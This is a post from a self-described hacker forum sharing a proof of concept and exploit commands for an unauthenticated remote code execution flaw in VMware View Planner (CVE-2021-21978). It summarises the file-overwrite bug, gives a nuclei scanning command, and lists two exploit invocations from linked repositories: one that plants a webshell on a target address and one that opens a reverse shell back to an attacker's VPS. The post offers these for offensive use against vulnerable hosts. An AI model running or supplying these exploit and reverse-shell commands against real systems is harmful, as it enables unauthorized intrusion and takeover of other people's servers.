POC - VMware View Planner | 暗网黑客社区论坛网站

黑客仓库

最全面知识的黑客论坛，全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库，您可以在我们的论坛板块进行交流和学习。

立即注册账号！

Shacker

黑客倉庫站長

贡献: 21%

09 13, 2024

JavaScript:

## 漏洞概述

VMware View Planner Web管理界面存在一个上传日志功能文件的入口，没有进行认证且写入的日志文件路径用户可控，通过覆盖上传日志功能文件`log_upload_wsgi.py`，即可实现RCE

## 影响范围

```http
VMware View Planner 4.6
```

## POC

```bash
nuclei -tags vmware -t cves/ -l urls.txt

Goby
```

## EXP

1、写webshell [@skytina](https://github.com/skytina/CVE-2021-21978)

```bash
python CVE-2021-21978.py https://192.168.80.3
```

2、反弹shell [@me1ons](https://github.com/me1ons/CVE-2021-21978)

```bash
python re-shell.py -u 目标IP -v VPS-IP -p 1234
```

POC CVE-2021-21978

POC VMware View Planner 未授权RCE漏洞（CVE-2021-21978）

点击展开...

好评 0 否决票

	POC VMware View Planner 未授权RCE漏洞（CVE-2021-21978） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC VMware vCenter Server未授权RCE漏洞 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC VMware vCenter Server未授权RCE漏洞（CVE-2021-21972） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Vmware Shacker 09 13, 2024 POC/?Day漏洞数据
	POC VMware vCenter Shacker 09 13, 2024 POC/?Day漏洞数据

黑客仓库

POC VMware View Planner

论坛统计

新会员

在线会员

关于我们